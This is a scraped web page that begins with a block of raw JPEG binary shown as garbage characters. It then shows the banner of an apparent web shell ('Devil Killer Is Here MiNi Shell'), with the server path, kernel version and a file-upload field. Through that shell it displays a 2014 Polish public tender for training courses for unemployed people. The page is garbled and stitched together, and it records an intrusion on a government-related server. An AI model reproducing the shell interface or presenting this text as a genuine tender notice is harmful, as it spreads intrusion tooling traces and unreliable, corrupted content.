JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140806/262474-N-2014.html

<p class="kh_header"><b>Aleksandrów Kujawski: Organizacja i przeprowadzenie szkoleń dla osób bezrobotnych: Część I -  szkolenie: Pracownik gastronomii,
Część II - szkolenie: Florystyka i bukieciarstwo, 
Część III - szkolenie:Pracownik działu księgowości</b><br>
<b>Numer ogłoszenia: 262474 - 2014; data zamieszczenia: 06.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Przemysłowa 1, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2824696, faks 054 2824696.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla osób bezrobotnych: Część I -  szkolenie: Pracownik gastronomii,
Część II - szkolenie: Florystyka i bukieciarstwo, 
Część III - szkolenie:Pracownik działu księgowości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Pracownik gastronomii
1)Szkolenie musi odbywać się w miejscowości Aleksandrów Kujawski.
2)Szkolenia musi zakończyć się egzaminem wewnętrznym i wydaniem odpowiedniego zaświadczenia o ukończeniu kursu. Szkolenie powinno zostać przeprowadzone zgodnie z zasadami określonymi w rozporządzeniu Ministra Edukacji Narodowej w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz.186) oraz spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. W przypadku bezrobotnych skierowanych w ramach środków Europejskiego Funduszu Społecznego, uczestnicy otrzymują dodatkowo certyfikat stanowiący załącznik do umowy.
3) Szkoleniem objętych będzie 12 osób bezrobotnych, zarejestrowanych 
w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Rozpoczęcie szkolenia przewidziane jest w III kwartale bieżącego roku.
4) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 120 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy. Szkolenie musi być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych. Zajęcia praktyczne muszą zostać zrealizowane w wymiarze co najmniej 80 godzin, z czego 40% zajęć praktycznych musi być przeprowadzona w funkcjonującym lokalu gastronomicznym. W ramach szkolenia musi zostać zrealizowany moduł z zakresu obsługi kas fiskalnych w wymiarze co najmniej 8 godzin.
5) Wykonawca zobowiązany jest do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków za cały okres kursu z wyłączeniem osób, które pobierają stypendium ( zgodnie z art. 41 ust 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy). Fakt ten Zamawiający potwierdzi na liście kandydatów przekazanej organizatorowi szkolenia. 
6)  W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego,
                  - wyposażenia sali do zajęć w materiały, produkty, surowce i urządzenia niezbędne do prawidłowego przebiegu procesu dydaktycznego,
		      - zapewnienia materiałów szkoleniowych, w postaci podręcznika lub skryptu ( zgodnie 
z prawem autorskim), notatnika, długopisu dla każdego uczestnika szkolenia,
                      - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                      - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                      - prowadzenia dziennika zajęć,
                      - zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i  wydanie dokumentu o ukończeniu szkolenia,
                      - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
                     - zapewnienia uczestnikom szkolenia bezpłatnego zaplecza socjalnego ( kawa, herbata, zimne napoje),
    - umieszczenia w miejscu szkolenia w widocznym miejscu logo Europejskiego Funduszu Społecznego.
7) Zajęcia  winny  odbywać  się  w  grupach,  a  liczba  osób  w  grupie  powinna  być dostosowana  do  warunków  lokalowych  oraz   sprzętowych  posiadanych  przez   wykonawcę  i  powinna  umożliwić  uczestnikom  kursu  korzystanie  w  dostateczny sposób  z  przekazywanej  wiedzy   teoretycznej 
 i praktycznej. 
8) Zajęcia musza odbywać się od poniedziałku do piątku, minimum 25 godzin zegarowych tygodniowo. Każda z osób w grupie winna zrealizować program o tej samej tematyce i takiej samej liczbie godzin szkolenia,
9) Warunki lokalowe  oraz  sprzętowe  zapewnione  przez   wykonawcę  powinny  umożliwić  uczestnikom kursu korzystanie w dostateczny sposób z przekazywanej wiedzy teoretycznej  i  praktycznej. W ramach szkolenia Wykonawca zobowiązany jest do zapewnienia stanowiska wyposażonego w kasę fiskalną, z pełnym profesjonalnym oprogramowaniem, niezbędnym do przeprowadzenia szkolenia, dla każdego uczestnika szkolenia, na czas zajęć praktycznych z tego zakresu.
10) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, surowce, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe.
11) Celem szkolenia jest wyposażenie uczestników w wiedzę, umiejętności praktyczne niezbędne do wykonywania pracy w zakresie obsługi małej gastronomii i innych pomocniczych stanowisk gastronomicznych, poznanie zagadnień związanych z technologią i materiałoznawstwem, profesjonalną obsługą konsumenta, organizacją stanowiska pracy, przepisami bhp i minimum sanitarnym, prezentacją potraw, doborem dań, obsługą kas fiskalnych.
Część II - Florystyka i bukieciarstwo
1)Szkolenie musi odbywać się w miejscowości Aleksandrów Kujawski.
2) Szkolenia musi zakończyć się egzaminem wewnętrznym i wydaniem odpowiedniego zaświadczenia o ukończeniu kursu. Szkolenie powinno zostać przeprowadzone zgodnie z zasadami określonymi w rozporządzeniu Ministra Edukacji Narodowej w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz.186) oraz spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. W przypadku bezrobotnych skierowanych w ramach środków Europejskiego Funduszu Społecznego, uczestnicy otrzymują dodatkowo certyfikat stanowiący załącznik do umowy.
3) Szkoleniem objętych będzie 12 osób bezrobotnych, zarejestrowanych 
w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Rozpoczęcie szkolenia przewidziane jest w III kwartale bieżącego roku.
4) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 120 godzin zegarowych kursu 
( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy. Szkolenie musi być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych, przy czym zajęcia praktyczne winny być przeprowadzone w wymiarze co najmniej 80 godzin. W ramach szkolenia musi zostać zrealizowany moduł z zakresu obsługi kas fiskalnych w wymiarze co najmniej 8 godzin.
5) Wykonawca zobowiązany jest do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków za cały okres kursu z wyłączeniem osób, które pobierają stypendium ( zgodnie z art. 41 ust 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy). Fakt ten Zamawiający potwierdzi na liście kandydatów przekazanej organizatorowi szkolenia. 
6)  W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego,
		        - zapewnienia materiałów szkoleniowych, w postaci podręcznika lub skryptu ( zgodnie 
z prawem autorskim), notatnika, długopisu dla każdego uczestnika szkolenia,
                      - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                      - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                      - prowadzenia dziennika zajęć,
                      - zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i  wydanie dokumentu o ukończeniu szkolenia,
                      - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
                     - zapewnienia uczestnikom szkolenia bezpłatnego zaplecza socjalnego ( kawa, herbata, zimne napoje),
   - umieszczenia w miejscu szkolenia w widocznym miejscu logo Europejskiego Funduszu Społecznego.
9) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 15:00, minimum 25 godzin zegarowych tygodniowo. Każda z osób w grupie winna zrealizować program o tej samej tematyce i takiej samej liczbie godzin szkolenia,
10) Warunki lokalowe  oraz  sprzętowe  zapewnione  przez   wykonawcę  powinny  umożliwić  uczestnikom kursu korzystanie w dostateczny sposób z przekazywanej wiedzy teoretycznej  i  praktycznej. W ramach szkolenia Wykonawca zobowiązany jest do zapewnienia samodzielnego stanowiska wyposażonego w kasę fiskalną, z pełnym profesjonalnym oprogramowaniem, niezbędnym do przeprowadzenia szkolenia, dla każdego uczestnika szkolenia, na czas realizacji modułu z zakresu obsługi kas fiskalnych. 
11) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe.
12) Celem szkolenia jest wyposażenie uczestników w wiedzę i umiejętności praktyczne z zakresu florystyki. 
13) Wykonawca winien zabezpieczyć wyposażenia sali, a także materiały do zajęć praktycznych w ilości niezbędnej do prawidłowego przebiegu procesu dydaktycznego (m. in. kwiaty cięte i zieleń cięta, rośliny sztuczne, gąbki do kwiatów żywych, gąbki do roślin suchych, druty, wstążki, sizal i rafia, świece, kora kokosowa, naczynia do kompozycji, taśmy maskujące, klej silikonowy, wianki słomiane, lakiery, pozostałe elementy dekoracyjne), a także narzędzia 
( noże florystyczne, sekatory, nożyczki, wazony, wiadra do kwiatów, miski do moczenia gąbki).
Część III - Pracownik działu księgowości
1) Szkolenie musi odbywać się w miejscowości Aleksandrów Kujawski. 
2) Szkolenia musi zakończyć się egzaminem wewnętrznym i wydaniem odpowiedniego zaświadczenia o ukończeniu kursu. Szkolenie powinno zostać przeprowadzone zgodnie z zasadami określonymi w rozporządzeniu Ministra Edukacji Narodowej w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz.186) oraz spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. W przypadku bezrobotnych skierowanych w ramach środków Europejskiego Funduszu Społecznego, uczestnicy otrzymują dodatkowo certyfikat stanowiący załącznik do umowy.
3) Szkoleniem objętych będzie 21 osób bezrobotnych, zarejestrowanych 
w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w dwóch grupach, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego - 20 osób oraz 1 osoba w ramach środków PFRON. Rozpoczęcie szkoleń przewidziane jest w III kwartale bieżącego roku.
4) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 140 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy. Szkolenie musi być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych. Przy czym zajęcia praktyczne nie mogą trwać dłużej niż 5 godzin zegarowych dziennie. W ramach szkolenia Wykonawca zobowiązany jest do zapewnienia samodzielnego stanowiska komputerowego z pełnym profesjonalnym oprogramowaniem, niezbędnym do przeprowadzenia szkolenia, dla każdego uczestnika szkolenia, na czas zajęć praktycznych. 
5) Sugerowana tematyka szkolenia (Zamawiający dopuszcza możliwość poszerzenia proponowanych tematów szkolenia o nowe zakresy tematyczne):  przepisy prawne dotyczące zagadnień księgowych i podatkowych w tym: zasad rachunkowości, ewidencji operacji gospodarczych oraz zasad prowadzenia ksiąg rachunkowych, prowadzenie ewidencji podatkowej, obowiązki zakładu pracy wobec Urzędu Skarbowego, podstawy rachunkowości finansowej, prowadzenie dokumentacji księgowej i rachunkowej, ewidencja i rozliczanie wynagrodzeń, świadczenia pieniężne z ubezpieczenia społecznego w razie choroby i macierzyństwa, obowiązki zakładu pracy wobec ZUS, ubezpieczenia społeczne, ubezpieczenia zdrowotne, składki na Fundusz Pracy i Fundusz Gwarantowanych Świadczeń Pracowniczych, inne.
6) Wykonawca zobowiązany jest do ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków za cały okres kursu z wyłączeniem osób, które pobierają stypendium ( zgodnie z art. 41 ust 7 ustawy o promocji zatrudnienia i instytucjach rynku pracy). Fakt ten Zamawiający potwierdzi na liście kandydatów przekazanej organizatorowi szkolenia. 
7)  W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego,
                  - wyposażenia sali do zajęć w materiały, produkty i urządzenia niezbędne do prawidłowego przebiegu procesu dydaktycznego,
		      - zapewnienia materiałów szkoleniowych, w postaci podręcznika lub skryptu ( zgodnie 
z prawem autorskim), notatnika, długopisu dla każdego uczestnika szkolenia,
                      - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                      - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                      - prowadzenia dziennika zajęć,
                      - zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i  wydanie dokumentu o ukończeniu szkolenia,
                      - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
                     - zapewnienia uczestnikom szkolenia bezpłatnego zaplecza socjalnego ( kawa, herbata, zimne napoje),
    - umieszczenia w miejscu szkolenia w widocznym miejscu logo Europejskiego Funduszu Społecznego.
8) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 15:00, minimum 25 godzin zegarowych tygodniowo. Każda z osób w grupie winna zrealizować program o tej samej tematyce i takiej samej liczbie godzin szkolenia,
9) Warunki lokalowe  oraz  sprzętowe  zapewnione  przez   wykonawcę  powinny  umożliwić  uczestnikom kursu korzystanie w dostateczny sposób z przekazywanej wiedzy teoretycznej  i  praktycznej.
10) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe.
11) Celem szkolenia jest wyposażenie uczestników w wiedzę i umiejętności niezbędne do obsługi finansowo-księgowej małych i średnich przedsiębiorstw z wykorzystaniem programów komputerowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek niniejszy spełniają Wykonawcy którzy: są wpisani do rejestru instytucji szkoleniowych prowadzonych przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (rozporządzenie Ministra Gospodarki i Pracy z dnia 27.10.2004r. w sprawie rejestru instytucji szkoleniowych) oraz złożą oświadczenie o aktualizacji wpisu na 2014 rok</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek niniejszy spełniają Wykonawcy, którzy w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zrealizowali przynajmniej dwa szkolenia, obejmujące przedmiot zamówienia o które się ubiegają w niniejszym postępowaniu i które prowadzone były dla grupy min. 5 osobowej (szkolącej się w tym samym miejscu i w tym samym czasie - chyba, że ze względu na specyfikę szkolenia, zostało ono przeprowadzone w podgrupach). Dla potwierdzenia wymienionego warunku Zamawiający żąda przedłożenia przez Wykonawcę oświadczenia, zgodnie z załącznik nr 8 do SIWZ. Zamawiający, na potwierdzenie należytego wykonania zamówienia, żąda załączenia dowodów potwierdzających, że Wykonawca należycie zrealizował co najmniej 2 usługi szkoleniowe o wskazanej tematyce, w okresie ostatnich trzech lat przed upływem terminu składania ofert dla każdego kursu o jaki Wykonawca się ubiega</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia wymienionego warunku Zamawiający żąda przedłożenia przez Wykonawcę oświadczenia - załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek niniejszy spełniają Wykonawcy, którzy dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia poprzez wykazanie, że: a) do prowadzenia zajęć teoretycznych, o których mowa w części I, III, posiadającą/ymi:
- wykształcenie wyższe,
- doświadczenie zawodowe w postaci przeprowadzenia co najmniej 1 szkolenia o podobnym zakresie tematycznym w stosunku do przedmiotowego szkolenia.
b) do prowadzenia zajęć teoretycznych, o których mowa w części II, posiadającą/ymi:
- wykształcenie co najmniej średnie,
- doświadczenie zawodowe w postaci przeprowadzenia co najmniej 1 szkolenia o podobnym zakresie tematycznym w stosunku do przedmiotowego szkolenia.
c) do prowadzenia zajęć praktycznych, o których mowa w części I i II posiadającą/ymi:
- wykształcenie co najmniej średnie,
- doświadczenie zawodowe w postaci przeprowadzenia co najmniej 1 szkolenia o podobnym zakresie tematycznym w stosunku do przedmiotowego szkolenia.
d) do prowadzenia zajęć praktycznych, o których mowa w części III posiadającą/ymi:
- wykształcenie wyższe,
- doświadczenie zawodowe w postaci przeprowadzenia co najmniej 1 szkolenia o podobnym zakresie tematycznym w stosunku do przedmiotowego szkolenia.
 Ocena wymienionego warunku będzie dokonywana w oparciu o oświadczenie dołączone do oferty - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

